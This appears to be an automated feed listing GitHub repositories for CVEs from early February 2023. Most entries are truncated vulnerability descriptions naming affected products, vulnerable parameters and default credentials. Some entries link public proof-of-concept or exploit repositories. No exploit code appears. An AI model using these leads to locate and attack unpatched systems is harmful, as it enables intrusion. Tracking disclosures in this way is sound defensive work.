**The PrivateContent plugin for WordPress is vulnerable to protection mechanism bypass due to the use of client side validation in versions up to, and including, 8.4.3. This is due to the plugin checking if an IP had been blocklist via client-side scripts rather than server-side. This makes it possible for unauthenticate CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0581](https://github.com/Live-Hack-CVE/CVE-2023-0581) create time: 2023-02-06T21:51:26Z

**Binwalk Remote Command Execution** : [electr0sm0g/CVE-2022-4510](https://github.com/electr0sm0g/CVE-2022-4510) create time: 2023-02-06T20:53:49Z

**OpenMage LTS is an e-commerce platform. Prior to versions 19.4.22 and 20.0.19, Magento admin users with access to the customer media could execute code on the server. Versions 19.4.22 and 20.0.19 contain a patch for this issue. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41143](https://github.com/Live-Hack-CVE/CVE-2021-41143) create time: 2023-02-06T19:41:59Z

**OpenMage LTS is an e-commerce platform. Prior to versions 19.4.22 and 20.0.19, a layout block was able to bypass the block blacklist to execute remote code. Versions 19.4.22 and 20.0.19 contain a patch for this issue. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41144](https://github.com/Live-Hack-CVE/CVE-2021-41144) create time: 2023-02-06T19:41:55Z

**OpenMage LTS is an e-commerce platform. Prior to versions 19.4.22 and 20.0.19, an administrator with the permissions to upload files via DataFlow and to create products was able to execute arbitrary code via the convert profile. Versions 19.4.22 and 20.0.19 contain a patch for this issue. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41231](https://github.com/Live-Hack-CVE/CVE-2021-41231) create time: 2023-02-06T19:41:50Z

**Several OS command injection vulnerabilities exist in the m2m binary of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger these vulnerabilities.This command injection is reachable through the m2m's D CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42492](https://github.com/Live-Hack-CVE/CVE-2022-42492) create time: 2023-02-06T19:42:57Z

**Several OS command injection vulnerabilities exist in the m2m binary of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger these vulnerabilities.This command injection is reachable through the m2m's D CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42490](https://github.com/Live-Hack-CVE/CVE-2022-42490) create time: 2023-02-06T19:42:54Z

**A heap-based buffer overflow vulnerability exists in the m2m DELETE_FILE cmd functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41991](https://github.com/Live-Hack-CVE/CVE-2022-41991) create time: 2023-02-06T19:42:50Z

**Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer ove CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41019](https://github.com/Live-Hack-CVE/CVE-2022-41019) create time: 2023-02-06T19:42:42Z

**Several OS command injection vulnerabilities exist in the m2m binary of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger these vulnerabilities.This command injection is reachable through the m2m's M CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42491](https://github.com/Live-Hack-CVE/CVE-2022-42491) create time: 2023-02-06T19:42:39Z

**A directory traversal vulnerability exists in the m2m DELETE_FILE cmd functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary file deletion. An attacker can send a network request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41154](https://github.com/Live-Hack-CVE/CVE-2022-41154) create time: 2023-02-06T19:42:35Z

**Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer ove CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41030](https://github.com/Live-Hack-CVE/CVE-2022-41030) create time: 2023-02-06T19:42:32Z

**A blind SSRF vulnerability was identified in all versions of GitLab EE prior to 15.4.6, 15.5 prior to 15.5.5, and 15.6 prior to 15.6.1 which allows an attacker to connect to a local host. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4335](https://github.com/Live-Hack-CVE/CVE-2022-4335) create time: 2023-02-06T19:42:21Z

**Pi-hole®'s Web interface (based off of AdminLTE) provides a central location to manage your Pi-hole. Versions 4.0 and above, prior to 5.18.3 are vulnerable to Insufficient Session Expiration. Improper use of admin WEBPASSWORD hash as "Remember me for 7 days" cookie value makes it possible for an attacker to "pass the h CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23614](https://github.com/Live-Hack-CVE/CVE-2023-23614) create time: 2023-02-06T19:42:46Z

**SOCOMEC MODULYS GP Netvision versions 7.20 and prior lack strong encryption for credentials on HTTP connections, which could result in threat actors obtaining sensitive information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0356](https://github.com/Live-Hack-CVE/CVE-2023-0356) create time: 2023-02-06T19:42:18Z

**Adobe Acrobat Reader versions 22.003.20282 (and earlier), 22.003.20281 (and earlier) and 20.005.30418 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22240](https://github.com/Live-Hack-CVE/CVE-2023-22240) create time: 2023-02-06T19:42:14Z

**Adobe Acrobat Reader versions 22.003.20282 (and earlier), 22.003.20281 (and earlier) and 20.005.30418 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22241](https://github.com/Live-Hack-CVE/CVE-2023-22241) create time: 2023-02-06T19:42:10Z

**Adobe Acrobat Reader versions 22.003.20282 (and earlier), 22.003.20281 (and earlier) and 20.005.30418 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22242](https://github.com/Live-Hack-CVE/CVE-2023-22242) create time: 2023-02-06T19:42:07Z

**A Server Side Request Forgery (SSRF) vulnerability exists in Tenable.sc due to improper validation of session & user-accessible input data. A privileged, authenticated remote attacker could interact with external and internal services covertly. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24495](https://github.com/Live-Hack-CVE/CVE-2023-24495) create time: 2023-02-06T19:42:03Z

**The components wfshbr64.sys and wfshbr32.sys in Another Eden before v3.0.20 and before v2.14.200 allows attackers to perform privilege escalation via a crafted payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48019](https://github.com/Live-Hack-CVE/CVE-2022-48019) create time: 2023-02-06T17:30:57Z

**pycdc commit 44a730f3a889503014fec94ae6e62d8401cb75e5 was discovered to contain a stack overflow via the component ASTree.cpp:BuildFromCode. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48078](https://github.com/Live-Hack-CVE/CVE-2022-48078) create time: 2023-02-06T17:30:48Z

**An issue in ASKEY router RTF3505VW-N1 BR_SV_g000_R3505VMN1001_s32_7 allows attackers to escalate privileges via running the tcpdump command after placing a crafted file in the /tmp directory and sending crafted packets through port 80. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47040](https://github.com/Live-Hack-CVE/CVE-2022-47040) create time: 2023-02-06T17:30:45Z

**Incorrect access control in Aternity agent in Riverbed Aternity before 12.1.4.27 allows for local privilege escalation. There is an insufficiently protected handle to the A180AG.exe SYSTEM process with PROCESS_ALL_ACCESS rights. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43997](https://github.com/Live-Hack-CVE/CVE-2022-43997) create time: 2023-02-06T17:30:41Z

**Guests can cause Xenstore crash via soft reset When a guest issues a "Soft Reset" (e.g. for performing a kexec) the libxl based Xen toolstack will normally perform a XS_RELEASE Xenstore operation. Due to a bug in xenstored this can result in a crash of xenstored. Any other use of XS_RELEASE will have the same impact. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42330](https://github.com/Live-Hack-CVE/CVE-2022-42330) create time: 2023-02-06T17:30:37Z

**This issue can affect BIND 9 resolvers with `stale-answer-enable yes;` that also make use of the option `stale-answer-client-timeout`, configured with a value greater than zero. If the resolver receives many queries that require recursion, there will be a corresponding increase in the number of clients that are waiting CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3924](https://github.com/Live-Hack-CVE/CVE-2022-3924) create time: 2023-02-06T17:30:33Z

**A path traversal vulnerability was identified in ReFirm Labs binwalk from version 2.1.2b through 2.3.3 included. By crafting a malicious PFS filesystem file, an attacker can get binwalk's PFS extractor to extract files at arbitrary locations when binwalk is run in extraction mode (-e option). Remote code execution can CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4510](https://github.com/Live-Hack-CVE/CVE-2022-4510) create time: 2023-02-06T17:30:10Z

**TOTOlink A7100RU(V7.4cu.2313_B20191024) was discovered to contain a command injection vulnerability via the country parameter at setting/delStaticDhcpRules. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24276](https://github.com/Live-Hack-CVE/CVE-2023-24276) create time: 2023-02-06T17:31:37Z

**Raffle Draw System v1.0 was discovered to contain a local file inclusion vulnerability via the page parameter in index.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24202](https://github.com/Live-Hack-CVE/CVE-2023-24202) create time: 2023-02-06T17:31:33Z

**Raffle Draw System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at get_ticket.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24201](https://github.com/Live-Hack-CVE/CVE-2023-24201) create time: 2023-02-06T17:31:29Z

**Raffle Draw System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at save_ticket.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24200](https://github.com/Live-Hack-CVE/CVE-2023-24200) create time: 2023-02-06T17:31:26Z

**Raffle Draw System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at delete_ticket.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24199](https://github.com/Live-Hack-CVE/CVE-2023-24199) create time: 2023-02-06T17:31:22Z

**Raffle Draw System v1.0 was discovered to contain multiple SQL injection vulnerabilities at save_winner.php via the ticket_id and draw parameters. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24198](https://github.com/Live-Hack-CVE/CVE-2023-24198) create time: 2023-02-06T17:31:18Z

**Online Food Ordering System v2 was discovered to contain a SQL injection vulnerability via the id parameter at view_order.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24197](https://github.com/Live-Hack-CVE/CVE-2023-24197) create time: 2023-02-06T17:31:15Z

**Online Food Ordering System v2 was discovered to contain a cross-site scripting (XSS) vulnerability via the page parameter in index.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24195](https://github.com/Live-Hack-CVE/CVE-2023-24195) create time: 2023-02-06T17:31:11Z

**Online Food Ordering System v2 was discovered to contain a cross-site scripting (XSS) vulnerability via the page parameter in navbar.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24194](https://github.com/Live-Hack-CVE/CVE-2023-24194) create time: 2023-02-06T17:31:08Z

**Online Food Ordering System v2 was discovered to contain a cross-site scripting (XSS) vulnerability via the redirect parameter in login.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24192](https://github.com/Live-Hack-CVE/CVE-2023-24192) create time: 2023-02-06T17:31:04Z

**Online Food Ordering System v2 was discovered to contain a cross-site scripting (XSS) vulnerability via the redirect parameter in signup.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24191](https://github.com/Live-Hack-CVE/CVE-2023-24191) create time: 2023-02-06T17:31:00Z

**All versions of Econolite EOS traffic control software are vulnerable to CWE-284: Improper Access Control, and lack a password requirement for gaining “READONLY” access to log files, as well as certain database and configuration files. One such file contains tables with message-digest algorithm 5 (MD5) hashes and usern CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0451](https://github.com/Live-Hack-CVE/CVE-2023-0451) create time: 2023-02-06T17:30:53Z

**A vulnerability in the Device Management Servlet application of Cisco BroadWorks Application Delivery Platform and Cisco BroadWorks Xtended Services Platform could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to improper input va CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-20020](https://github.com/Live-Hack-CVE/CVE-2023-20020) create time: 2023-02-06T17:30:29Z

**A vulnerability in the web-based management interface of Cisco BroadWorks Application Delivery Platform, Cisco BroadWorks Application Server, and Cisco BroadWorks Xtended Services Platform could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface of a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-20019](https://github.com/Live-Hack-CVE/CVE-2023-20019) create time: 2023-02-06T17:30:26Z

**Campbell Scientific dataloggers CR6, CR300, CR800, CR1000 and CR3000 may allow an attacker to download configuration files, which may contain sensitive information about the internal network. From factory defaults, the mentioned datalogges have HTTP and PakBus enabled. The devices, with the default configuration, allow CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0321](https://github.com/Live-Hack-CVE/CVE-2023-0321) create time: 2023-02-06T17:30:22Z

**Improper Input Validation of LDAP user IDs in Tribe29 Checkmk allows attackers that can control LDAP user IDs to manipulate files on the server. Checkmk <= 2.1.0p19, Checkmk <= 2.0.0p32, and all versions of Checkmk 1.6.0 (EOL) are affected. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0284](https://github.com/Live-Hack-CVE/CVE-2023-0284) create time: 2023-02-06T17:30:18Z

**A flaw was found in github.com/openshift/apiserver-library-go, used in OpenShift 4.12 and 4.11, that contains an issue that can allow low-privileged users to set the seccomp profile for pods they control to "unconfined." By default, the seccomp profile used in the restricted-v2 Security Context Constraint (SCC) is "run CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0229](https://github.com/Live-Hack-CVE/CVE-2023-0229) create time: 2023-02-06T17:30:14Z

**Western Digital My Cloud devices before OS5 do not use cryptographically signed Firmware upgrade files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36226](https://github.com/Live-Hack-CVE/CVE-2021-36226) create time: 2023-02-06T15:16:16Z

**Western Digital My Cloud devices before OS5 allow REST API access by low-privileged accounts, as demonstrated by API commands for firmware uploads and installation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36225](https://github.com/Live-Hack-CVE/CVE-2021-36225) create time: 2023-02-06T15:16:13Z

**Western Digital My Cloud devices before OS5 have a nobody account with a blank password. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36224](https://github.com/Live-Hack-CVE/CVE-2021-36224) create time: 2023-02-06T15:16:09Z

**Unexpected Pointer Aliasing in IEEE 802154 Fragment Reassembly in Zephyr. Zephyr versions >= >=2.4.0 contain NULL Pointer Dereference (CWE-476). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-p86r-gc4r-4mq3 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3322](https://github.com/Live-Hack-CVE/CVE-2021-3322) create time: 2023-02-06T15:15:59Z

**Session fixation vulnerability in CuppaCMS thru commit 4c9b742b23b924cf4c1f943f48b278e06a17e297 on November 12, 2019 allows attackers to gain access to arbitrary user sessions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29368](https://github.com/Live-Hack-CVE/CVE-2021-29368) create time: 2023-02-06T15:15:47Z

**Multiple Unauthenticated Stored Cross-Site Scripting (XSS) vulnerabilities in KB Support (WordPress plugin) <= 1.5.5 versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27852](https://github.com/Live-Hack-CVE/CVE-2022-27852) create time: 2023-02-06T15:16:47Z

**ezEIP v5.3.0(0649) was discovered to contain a cross-site scripting (XSS) vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45722](https://github.com/Live-Hack-CVE/CVE-2022-45722) create time: 2023-02-06T15:16:39Z

**Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Afterpay Gateway for WooCommerce <= 3.5.0 versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29416](https://github.com/Live-Hack-CVE/CVE-2022-29416) create time: 2023-02-06T15:16:35Z

**Cross-Site Request Forgery (CSRF) vulnerability in AA-Team WZone – Lite Version plugin 3.1 Lite versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27628](https://github.com/Live-Hack-CVE/CVE-2022-27628) create time: 2023-02-06T15:16:31Z

**An access control issue in the component /cgi-bin/ExportLogs.sh of Wavlink WL-WN533A8 M33A8.V5030.190716 allows unauthenticated attackers to download configuration data and log files and obtain admin credentials. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48164](https://github.com/Live-Hack-CVE/CVE-2022-48164) create time: 2023-02-06T15:16:28Z

**Softr v2.0 was discovered to contain a HTML injection vulnerability via the Work Space Name parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48085](https://github.com/Live-Hack-CVE/CVE-2022-48085) create time: 2023-02-06T15:16:24Z

**CRMEB 4.4.4 is vulnerable to Any File download. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44343](https://github.com/Live-Hack-CVE/CVE-2022-44343) create time: 2023-02-06T15:16:20Z

**** UNSUPPORTED WHEN ASSIGNED ** TrendNet Wireless AC Easy-Upgrader TEW-820AP v1.0R, firmware version 1.01.B01 was discovered to contain a stack overflow via the submit-url parameter at /formNewSchedule. This vulnerability allows attackers to execute arbitrary code via a crafted payload. NOTE: This vulnerability only af CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47065](https://github.com/Live-Hack-CVE/CVE-2022-47065) create time: 2023-02-06T15:15:53Z

**A vulnerability was found in SourceCodester Canteen Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file removeUser.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0679](https://github.com/Live-Hack-CVE/CVE-2023-0679) create time: 2023-02-06T15:16:43Z

**HL7 (Health Level 7) FHIR Core Libraries before 5.6.92 allow attackers to extract files into arbitrary directories via directory traversal from a crafted ZIP or TGZ archive (for a prepackaged terminology cache, NPM package, or comparison archive). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24057](https://github.com/Live-Hack-CVE/CVE-2023-24057) create time: 2023-02-06T15:16:03Z

**A privilege escalation vulnerability exists in Delta Electronics InfraSuite Device Master 00.00.02a. A default user 'User', which is in the 'Read Only User' group, can view the password of another default user 'Administrator', which is in the 'Administrator' group. This allows any lower privileged user to log in as an CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0444](https://github.com/Live-Hack-CVE/CVE-2023-0444) create time: 2023-02-06T15:15:43Z

**Buffer overflow vulnerability in function json_parse_string in sheredom json.h before commit 0825301a07cbf51653882bf2b153cc81fdadf41 (November 14, 2022) allows attackers to code arbitrary code and gain escalated privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45496](https://github.com/Live-Hack-CVE/CVE-2022-45496) create time: 2023-02-06T14:11:02Z

**Buffer overflow vulnerability in function json_parse_key in sheredom json.h before commit 0825301a07cbf51653882bf2b153cc81fdadf41 (November 14, 2022) allows attackers to code arbitrary code and gain escalated privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45493](https://github.com/Live-Hack-CVE/CVE-2022-45493) create time: 2023-02-06T14:10:58Z

**Imagemagick CVE-2022-44268** : [Vulnmachines/imagemagick-CVE-2022-44268](https://github.com/Vulnmachines/imagemagick-CVE-2022-44268) create time: 2023-02-06T10:45:42Z

**ImageMagick LFI PoC [CVE-2022-44268]** : [Sybil-Scan/imagemagick-lfi-poc](https://github.com/Sybil-Scan/imagemagick-lfi-poc) create time: 2023-02-06T10:44:43Z

**A vulnerability has been found in Gimmie Plugin 1.2.2 and classified as critical. Affected by this vulnerability is an unknown functionality of the file trigger_login.php. The manipulation of the argument userid leads to sql injection. Upgrading to version 1.3.0 is able to address this issue. The name of the patch is f CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125086](https://github.com/Live-Hack-CVE/CVE-2014-125086) create time: 2023-02-06T06:31:09Z

**A vulnerability classified as problematic was found in ciubotaru share-on-diaspora 0.7.9. This vulnerability affects unknown code of the file new_window.php. The manipulation of the argument title/url leads to cross site scripting. The attack can be initiated remotely. The name of the patch is fb6fae2f8a9b146471450b5b0 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20176](https://github.com/Live-Hack-CVE/CVE-2017-20176) create time: 2023-02-06T06:31:13Z

**All versions of the package create-choo-app3 are vulnerable to Command Injection via the devInstall function due to improper user-input sanitization. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25855](https://github.com/Live-Hack-CVE/CVE-2022-25855) create time: 2023-02-06T06:31:06Z

**All versions of the package semver-tags are vulnerable to Command Injection via the getGitTagsRemote function due to improper input sanitization. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25853](https://github.com/Live-Hack-CVE/CVE-2022-25853) create time: 2023-02-06T06:31:02Z

**There is a command injection vulnerability in SolarView Compact through 6.00, attackers can execute commands by bypassing internal restrictions through downloader.php.** : [Timorlover/CVE-2023-23333](https://github.com/Timorlover/CVE-2023-23333) create time: 2023-02-06T06:20:40Z

**CVE-2022-21587 POC** : [hieuminhnv/CVE-2022-21587-POC-](https://github.com/hieuminhnv/CVE-2022-21587-POC-) create time: 2023-02-06T04:18:24Z

**A vulnerability, which was classified as critical, was found in Gimmie Plugin 1.2.2. Affected is an unknown function of the file trigger_ratethread.php. The manipulation of the argument t/postusername leads to sql injection. Upgrading to version 1.3.0 is able to address this issue. The name of the patch is f11a136e9cbd CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125085](https://github.com/Live-Hack-CVE/CVE-2014-125085) create time: 2023-02-06T01:56:55Z

**A vulnerability, which was classified as critical, has been found in Gimmie Plugin 1.2.2. This issue affects some unknown processing of the file trigger_referral.php. The manipulation of the argument referrername leads to sql injection. Upgrading to version 1.3.0 is able to address this issue. The name of the patch is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125084](https://github.com/Live-Hack-CVE/CVE-2014-125084) create time: 2023-02-06T01:56:51Z

**internal/XMLReader.cpp in Apache Xerces-C before 3.1.2 allows remote attackers to cause a denial of service (segmentation fault and crash) via crafted XML data. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-0252](https://github.com/Live-Hack-CVE/CVE-2015-0252) create time: 2023-02-05T23:43:09Z

**The Apache Xerces-C 3.0.0 to 3.2.3 XML parser contains a use-after-free error triggered during the scanning of external DTDs. This flaw has not been addressed in the maintained version of the library and has no current mitigation other than to disable DTD processing. This can be accomplished via the DOM using a standar CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1311](https://github.com/Live-Hack-CVE/CVE-2018-1311) create time: 2023-02-05T23:43:06Z

**CVE-2021-35287** : [l00neyhacker/CVE-2021-35287](https://github.com/l00neyhacker/CVE-2021-35287) create time: 2023-02-05T22:37:02Z

**CVE-2021-35286** : [l00neyhacker/CVE-2021-35286](https://github.com/l00neyhacker/CVE-2021-35286) create time: 2023-02-05T22:35:04Z

**CVE-2011-2523 exploit** : [0xFTW/CVE-2011-2523](https://github.com/0xFTW/CVE-2011-2523) create time: 2023-02-05T22:17:34Z

**A vulnerability classified as problematic has been found in DaSchTour matomo-mediawiki-extension up to 2.4.2. This affects an unknown part of the file Piwik.hooks.php of the component Username Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been d CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20175](https://github.com/Live-Hack-CVE/CVE-2017-20175) create time: 2023-02-05T21:32:46Z

**SCHLIX CMS 2.2.7-2 arbitrary File Upload** : [tristao-marinho/CVE-2022-45544](https://github.com/tristao-marinho/CVE-2022-45544) create time: 2023-02-05T21:45:37Z

**A PoC for the CVE-2022-44268 - ImageMagick arbitrary file read** : [voidz0r/CVE-2022-44268](https://github.com/voidz0r/CVE-2022-44268) create time: 2023-02-05T18:42:27Z

**Tenda N300 Authentication Bypass via Malformed HTTP Eequest Header** : [dumitory-dev/CVE-2020-35391-POC](https://github.com/dumitory-dev/CVE-2020-35391-POC) create time: 2023-02-05T13:42:55Z

**There are issues with the AGE drivers for Golang and Python that enable SQL injections to occur. This impacts AGE for PostgreSQL 11 & AGE for PostgreSQL 12, all versions up-to-and-including 1.1.0, when using those drivers. The fix is to update to the latest Golang and Python drivers in addition to the latest version of CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45786](https://github.com/Live-Hack-CVE/CVE-2022-45786) create time: 2023-02-04T23:33:10Z

**An improper neutralization of input during web page generation ('Cross-site Scripting') [CWE-79] vulnerability in Sling App CMS version 1.1.4 and prior may allow an authenticated remote attacker to perform a reflected cross-site scripting (XSS) attack in multiple features. Upgrade to Apache Sling App CMS >= 1.1.6 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22849](https://github.com/Live-Hack-CVE/CVE-2023-22849) create time: 2023-02-04T23:33:13Z

**no description** : [peteribi/CVE-2021-27077](https://github.com/peteribi/CVE-2021-27077) create time: 2023-02-04T22:13:35Z

**Analysis of the ransom demands from Shodan results** : [n2x4/Feb2023-CVE-2021-21974-OSINT](https://github.com/n2x4/Feb2023-CVE-2021-21974-OSINT) create time: 2023-02-04T21:23:20Z

**hb-ot-layout-gsubgpos.hh in HarfBuzz through 6.0.0 allows attackers to trigger O(n^2) growth via consecutive marks during the process of looking back for base glyphs when attaching marks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25193](https://github.com/Live-Hack-CVE/CVE-2023-25193) create time: 2023-02-04T21:19:30Z

**The read_samples function in hcom.c in Sound eXchange (SoX) 14.4.2 allows remote attackers to cause a denial of service (invalid memory read and application crash) via a crafted hcom file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-11358](https://github.com/Live-Hack-CVE/CVE-2017-11358) create time: 2023-02-04T18:00:47Z

**A flaw was found in sox 14.4.1. The lsx_adpcm_init function within libsox leads to a global-buffer-overflow. This flaw allows an attacker to input a malicious file, leading to the disclosure of sensitive information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3643](https://github.com/Live-Hack-CVE/CVE-2021-3643) create time: 2023-02-04T18:00:43Z

**Improper Authorization in GitHub repository phpipam/phpipam prior to v1.5.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0678](https://github.com/Live-Hack-CVE/CVE-2023-0678) create time: 2023-02-04T15:50:30Z

**Cross-site Scripting (XSS) - Reflected in GitHub repository phpipam/phpipam prior to v1.5.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0677](https://github.com/Live-Hack-CVE/CVE-2023-0677) create time: 2023-02-04T15:50:27Z

**Cross-site Scripting (XSS) - Reflected in GitHub repository phpipam/phpipam prior to 1.5.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0676](https://github.com/Live-Hack-CVE/CVE-2023-0676) create time: 2023-02-04T15:50:23Z

**no description** : [PyterSmithDarkGhost/CVE-2023-21608-EXPLOIT](https://github.com/PyterSmithDarkGhost/CVE-2023-21608-EXPLOIT) create time: 2023-02-04T14:44:19Z

**A vulnerability, which was classified as problematic, has been found in MobileDetect 2.8.31. This issue affects the function initLayoutType of the file examples/session_example.php of the component Example. The manipulation of the argument $_SERVER['PHP_SELF'] leads to cross site scripting. The attack may be initiated CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25080](https://github.com/Live-Hack-CVE/CVE-2018-25080) create time: 2023-02-04T11:26:19Z

**A vulnerability classified as critical has been found in OnShift TurboGears 1.0.11.10. This affects an unknown part of the file turbogears/controllers.py of the component HTTP Header Handler. The manipulation leads to http response splitting. It is possible to initiate the attack remotely. Upgrading to version 1.0.11.1 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-25101](https://github.com/Live-Hack-CVE/CVE-2019-25101) create time: 2023-02-04T11:26:23Z

**A vulnerability was found in Calendar Event Management System 2.3.0. It has been rated as critical. This issue affects some unknown processing of the component Login Page. The manipulation of the argument name/pwd leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0663](https://github.com/Live-Hack-CVE/CVE-2023-0663) create time: 2023-02-04T11:26:36Z

**A vulnerability, which was classified as critical, was found in Calendar Event Management System 2.3.0. This affects an unknown part. The manipulation of the argument start/end leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The ident CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0675](https://github.com/Live-Hack-CVE/CVE-2023-0675) create time: 2023-02-04T11:26:33Z

